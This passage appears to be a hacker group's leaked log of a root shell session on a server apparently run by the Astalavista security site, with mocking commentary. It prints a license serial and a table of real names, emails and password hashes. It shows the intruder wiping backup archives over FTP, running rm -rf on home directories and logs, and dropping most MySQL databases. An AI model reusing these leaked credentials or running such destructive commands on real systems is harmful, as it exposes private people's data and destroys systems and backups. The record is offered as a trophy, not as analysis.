xr-x 2 root root 4096 Mar 11 17:56 media drwxr-xr-x 2 root root 0 Jun 3 02:43 misc drwxr-xr-x 2 root
root 4096 Mar 11 17:56 mnt -rw-r--r-- 1 root root 5859 Feb 3 2008 mrtg.cfg drwxr-xr-x 2 root root 0 Jun
3 02:43 net drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc
drwxr-x--- 15 root root 4096 Jun 4 08:40 root drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin drwxr-xr-x 2
root root 4096 Mar 11 17:56 selinux drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv drwxr-xr-x 11 root
root 0 Jun 3 02:42 sys drwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp drwxr-xr-x 16 root root 4096 Jun
2 13:56 usr drwxr-xr-x 26 root root 4096 Jun 4 03:16 var sh-3.2# cd opt sh-3.2# ls -la total 20 drwxr-xr-x
3 root root 4096 Mar 11 17:56 . drwxr-xr-x 25 root root 4096 Jun 3 02:43 .. drwxr-xr-x 15 root root 4096
Mar 20 2008 lsws sh-3.2# cd lsws/ sh-3.2# ls -la total 108 drwxr-xr-x 15 root root 4096 Mar 20 2008 .
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .. drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons drwxr-xr-x
13 root root 4096 May 29 15:10 admin drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
drwxr-xr-x 2 root root 4096 May 29 15:10 bin drwx------ 4 apache apache 4096 Jun 3 02:43 conf drwxr-
xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT drwxr-xr-x 2 root root 4096 Sep 15 2008 docs drwxr-
xr-x 2 root root 4096 May 29 15:10 fcgi-bin drwxr-xr-x 2 root root 4096 Sep 15 2008 lib -rw-r--r-- 1 root
root 6959 May 29 15:10 LICENSE -rw-r--r-- 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP -rw-r--r-- 1
root root 6279 May 29 15:10 LICENSE.OpenSSL -rw-r--r-- 1 root root 3208 May 29 15:10 LICENSE.PHP
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs drwxr-xr-x 2 root root 4096 Mar 20 2008 php drwx------ 2
apache apache 4096 Mar 20 2008 phpbuild drwxr-xr-x 3 root root 4096 Mar 20 2008 share -rw-r--r-- 1
root root 6 May 29 15:10 VERSION sh-3.2# cd conf sh-3.2# ls -la total 48 drwx------ 4 apache apache 4096
Jun 3 02:43 . drwxr-xr-x 15 root root 4096 Mar 20 2008 .. drwx------ 2 apache apache 4096 Mar 20 2008
cert -rw-r--r-- 1 apache apache 6668 May 29 15:13 httpd_config.xml -rw------- 1 apache apache 6613
May 27 18:33 httpd_config.xml.bak -rw-r--r-- 1 root apache 0 Jun 3 14:11 .last -rw------- 1 apache apache
256 May 29 15:10 license.key -rw------- 1 apache apache 256 Mar 21 2008 license.key.old -rw------- 1
apache apache 3320 Mar 20 2008 mime.properties -rw------- 1 apache apache 20 May 29 15:10 serial.no
drwx------ 2 apache apache 4096 Mar 20 2008 templates sh-3.2# cat serial.no IbDl-oVsO-CKqL-wVRa sh-
3.2# mysql Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is
286844 Server version: 5.0.45-community-log MySQL Community Edition (GPL) Type 'help;' or '\h' for
help. Type '\c' to clear the buffer. mysql> show databases; +-----------------------+ | Database | +--------------
---------+ | information_schema | | astanet_ads | | astanet_mailing_lists | | astanet_mediawiki | |
astanet_membersystem | | com_contrexx | | com_contrexx2 | | com_contrexx2_live | | da_roundcube
| | dolphin | | ideapool | | mysql | | test | | yourmaster | +-----------------------+ 14 rows in set (0.00 sec)
mysql> use ideapool Database changed mysql> show tables; +-----------------------------------+ |
Tables_in_ideapool | +-----------------------------------+ | eventum_columns_to_display | |
eventum_custom_field | | eventum_custom_field_option | | eventum_custom_filter | |
eventum_customer_account_manager | | eventum_customer_note | | eventum_email_account | |
eventum_email_draft | | eventum_email_draft_recipient | | eventum_email_response | |
eventum_faq | | eventum_faq_support_level | | eventum_group | | eventum_history_type | |
eventum_irc_notice | | eventum_issue | | eventum_issue_association | | eventum_issue_attachment |
| eventum_issue_attachment_file | | eventum_issue_checkin | | eventum_issue_custom_field | |
eventum_issue_history | | eventum_issue_quarantine | | eventum_issue_requirement | |
eventum_issue_user | | eventum_issue_user_replier | | eventum_link_filter | | eventum_mail_queue |
| eventum_mail_queue_log | | eventum_news | | eventum_note | | eventum_phone_support | |
eventum_project | | eventum_project_category | | eventum_project_custom_field | |
eventum_project_email_response | | eventum_project_field_display | | eventum_project_group | |
eventum_project_link_filter | | eventum_project_news | | eventum_project_phone_category | |
eventum_project_priority | | eventum_project_release | | eventum_project_round_robin | |
eventum_project_status | | eventum_project_status_date | | eventum_project_user | |
eventum_reminder_action | | eventum_reminder_action_list | | eventum_reminder_action_type | |
eventum_reminder_field | | eventum_reminder_history | | eventum_reminder_level | |
eventum_reminder_level_condition | | eventum_reminder_operator | | eventum_reminder_priority |
| eventum_reminder_requirement | | eventum_reminder_triggered_action | | eventum_resolution | |
eventum_round_robin_user | | eventum_search_profile | | eventum_status | | eventum_subscription
| | eventum_subscription_type | | eventum_support_email | | eventum_support_email_body | |
eventum_time_tracking | | eventum_time_tracking_category | | eventum_user | +---------------------------
--------+ 69 rows in set (0.00 sec) mysql> describe eventum_user; +-------------------------+------------------+----
--+-----+---------------------+----------------+ | Field | Type | Null | Key | Default | Extra | +-------------------------
+------------------+------+-----+---------------------+----------------+ | usr_id | int(11) unsigned | NO | PRI | NULL |
auto_increment | | usr_grp_id | int(11) unsigned | YES | MUL | NULL | | | usr_customer_id | int(11)
unsigned | YES | | NULL | | | usr_customer_contact_id | int(11) unsigned | YES | | NULL | | |
usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | | | usr_status | varchar(8) | NO | | active
| | | usr_password | varchar(32) | NO | | | | | usr_full_name | varchar(255) | NO | | | | | usr_email |
varchar(255) | NO | UNI | | | | usr_preferences | longtext | YES | | NULL | | | usr_sms_email |
varchar(255) | YES | | NULL | | | usr_clocked_in | tinyint(1) | YES | | 0 | | | usr_lang | varchar(5) | YES
| | NULL | | +-------------------------+------------------+------+-----+---------------------+----------------+ 13 rows in set
(0.00 sec) mysql> select usr_full_name,usr_email,usr_password from eventum_user; +----------------------
+-------------------------------+----------------------------------+ | usr_full_name | usr_email | usr_password | +----
------------------+-------------------------------+----------------------------------+ | system | system-
account@example.com | 14589714398751513457adf349173434 | | Developer (Paulo) |
paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb | | Be1er0ph0r |
be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce | | Admin | pascal.mittner@astalavista.ch
| 57c2877c1d84c4b49f3289657deca65c | | ADMIN | admin@astalavista.ch |
f6fdffe48c908deb0f4c3bd36c032e72 | | USER | user@astalavista.ch |
5cc32e366c87c4cb49e4309b75f57d64 | | Glafkos - (nowayout) | glafkos@astalavista.com |
f7735ab119023a8abb2301e67f81cd67 | | Joao | joao.pontes@astalavista.net |
f805c071d7c823b937448c54c047b9fd | | Pascal | pm@astalavista.ch |
e10adc3949ba59abbe56e057f20f883e | | commander | commander@astalavista.com |
932cd250918f881d41feb0b93883a926 | | ishtus | ishtus@astalavista.com |
a587ffc88b3dbbba3fd2fe67af649ff0 | | sykadul | sykadul@astalavista.com |
20224a2f3eeb57a13a10b4df543c128e | | Zach McElroy | admin@badfoo.net |
33c5d4954da881814420f3ba39772644 | | usb | usbenigma@hushmail.com |
b513f22c3db6932855ad732f5f8a10a2 | | cyph3r | cyph3r@astalavista.com |
6e1e50017a945e874d52ec91f9ab2cee | +----------------------+-------------------------------+--------------------------
--------+ 15 rows in set (0.00 sec) mysql> select iss_description from eventum_issue where iss_id = 43; +--
------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------+ | iss_description | +--------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------
-----------------------------------+ | Ok guys, to boost our traffic and revenue what we have to do is keep users
logged in... how to do that? well think about it... if a user is watching a movie... he'll be connected for 90
mins... 120mins... so what i propose is something like: http://www.surfthechannel.com/ since they only
provide LINKS to the movies they are LEGAL and don't break DMCA rules... so we could do the same...
"iframe" the content on our website or use a system like podcast that uses our own flash player to
stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only
viewed... which doesn't break any laws as far as i am aware (we should research on that just to be sure
though!) Of course we would have to provide users with the button to take the content off if they think
it breaks copyright laws and we will remove it... i think that makes it on the border of DMCA... We could
also put advertisement during play on the flash video player itself... extra $$... By sykadul | +----------------
------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------
---------------------------------------------------------+ 1 row in set (0.00 sec) // Money and extra $$ is all they care
about. remember that. mysql> select iss_summary,iss_description from eventum_issue where iss_id
=42; +------------------------+---------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------------------+ |
iss_summary | iss_description | +------------------------+--------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------
-----------------------------+ | Forum for REAL EXPERTS | Hello, Ishtus and I, Came up with a crazy and very
workable and professional idea. We create an invitation only forum with the BEST security experts
worldwide ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc.. One
example a friend of mine from coresecurity.com! We could have big projects etc.. and we can work all
together to bring to the security community exploits, open source software etc.. | +------------------------+--
------------------------------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------+ 1 row in set (0.00 sec) // What
an awesome yet original idea Ishtus and him... bring MORE security "experts", thats exactly what the
world needs... mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16; +-------
-----------+---------------------------------------------------------------------------------------------+ | iss_summary |
iss_description | +------------------+---------------------------------------------------------------------------------------------+
| Website guidance | Virtual Girl which guides you trought the website. We need a girl with who you can
( talk )!!! Also for the News! So my suggestion is a girl who read you the news loud if you like! you can
choose between read yourselfe or she read it for you or both! Go to www.heise.de! There is an example
for Voice News! It's a good thing!!! Have a look on the example girls!!
http://www.yaoti.com/de/free_yaoti.html or that http://www.yellostrom.de/ | +------------------+-----------
----------------------------------------------------------------------------------+ 1 row in set (0.00 sec) // ha ha. mysql>
select iss_summary,iss_description from eventum_issue where iss_id = 7; +--------------------------+-----------
------------------------------------------------------------------------------------------------+ | iss_summary |
iss_description | +--------------------------+--------------------------------------------------------------------------------------
---------------------+ | Exploit Development Team | We need an exploit development team to focus on
exploit research and publication under Astalavista name. | +--------------------------+-------------------------------
----------------------------------------------------------------------------+ 1 row in set (0.00 sec) // LOL. mysql> exit Bye
sh-3.2# ftp 212.254.194.163 Connected to 212.254.194.163. 220 BackupCOM_VW FTP server ready. 504
AUTH: security mechanism 'GSSAPI' not supported. 504 AUTH: security mechanism 'KERBEROS_V4' not
supported. KERBEROS_V4 rejected as an authentication type Name (212.254.194.163:root):
astalavista.com 331 Password required for astalavista.com. Password: 230 User astalavista.com logged
in. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -la 227 Entering Passive
Mode (212,254,194,163,2,188) 150 Opening BINARY mode data connection for 'file list'. dr-x------ 1 root
users 4096 Jun 4 06:13 astalavista.com 226 Transfer complete. ftp> cd astalavista.com 250 CWD
command successful. ftp> ls -la 227 Entering Passive Mode (212,254,194,163,2,189) 150 Opening
BINARY mode data connection for 'file list'. -rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29
22:10 09-04-28-astacom_full.tar -rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-
28-astacom_full.tar.bz2 -rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-
astacom_sql_full.sql.tar.bz2 -rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-
astacom-Public_HTML.tar -rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-
astacom-SQL_Dump.tar [snip] 226 Transfer complete. ftp> mdelete * ftp> ls -la 227 Entering Passive
Mode (212,254,194,163,2,193) 150 Opening BINARY mode data connection for 'file list'. 226 Transfer
complete. ftp> sh-3.2# cd /home sh-3.2# ls -la total 120 drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .. drwx--x--x 9 admin admin 4096 Nov 28 2007 admin -rw-------
1 root root 8192 Jun 4 03:03 aquota.group -rw------- 1 root root 8192 Jun 3 02:45 aquota.user drwx--x--x
6 astanet astanet 4096 Jun 4 09:51 astanet drwxr-xr-x 2 root root 4096 Jul 29 2008 backup drwxr-xr-x 2
root root 4096 Sep 17 2008 backup.14161 drwx--x--x 10 com com 4096 Apr 28 12:40 com drwxr-xr-x 2
root root 4096 May 17 2007 ftp drwx------ 3 jon jon 4096 Sep 21 2007 jon drwx------ 2 root root 16384
Sep 11 2007 lost+found drwxr-xr-x 2 root root 4096 Sep 14 2007 my drwxr-xr-x 5 mysql mysql 4096 Sep
24 2007 mysqldata drwx------ 2 jon jon 4096 Sep 15 2007 test drwxrwxrwt 2 root root 4096 Jul 29 2008
tmp sh-3.2# rm -rf backup/ sh-3.2# rm -rf backup.14161/ sh-3.2# rm -rf ftp/ sh-3.2# rm -rf jon/ sh-3.2#
rm -rf my/ sh-3.2# rm -rf mysqldata/ sh-3.2# rm -rf test/ sh-3.2# rm -rf tmp/ sh-3.2# cd ~ sh-3.2# rm -rf *
sh-3.2# rm -rf /var/log/ rm: cannot remove directory `/var/log//proftpd': Directory not empty sh-3.2#
rm -rf /home/* sh-3.2# mysql Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL
connection id is 407156 Server version: 5.0.45-community-log MySQL Community Edition (GPL) Type
'help;' or '\h' for help. Type '\c' to clear the buffer. mysql> show databases; +-----------------------+ |
Database | +-----------------------+ | information_schema | | astanet_ads | | astanet_mailing_lists | |
astanet_mediawiki | | astanet_membersystem | | com_contrexx | | com_contrexx2 | |
com_contrexx2_live | | da_roundcube | | dolphin | | ideapool | | mysql | | test | | yourmaster | +------
-----------------+ 14 rows in set (0.03 sec) mysql> drop database astanet_membersystem; droQuery OK, 46
rows affected (0.81 sec) mysql> drop database com_contrexx; Query OK, 211 rows affected (2.72 sec)
mysql> drop database com_contrexx2; Query OK, 237 rows affected (2.23 sec) mysql> drop database
com_contrexx2_live; Query OK, 227 rows affected (7.63 sec) mysql> drop database ideapool; Query OK,
69 rows affected (0.19 sec) mysql> drop database yourmaster; Query OK, 158 rows affected (0.55 sec)
mysql> drop database astanet_ads; Query OK, 9 rows affected (0.11 sec) mysql> drop database
astanet_mailing_lists; Query OK, 24 rows affected (1.47 sec) mysql> drop database astanet_mediawiki;
Query OK, 31 rows affected (0.51 sec) mysql> show databases; +--------------------+ | Database | +-----------
---------+ | information_schema | | da_roundcube | | dolphin | | mysql | | test | +--------------------+ 5
rows in set (0.00 sec) What a journey! We're not sure exactly why the "Terminator" had any influence
on their naming (conventions) but we're sure Arnold himself wouldn't be in the wrong to say this pack of
morons *wont be back*.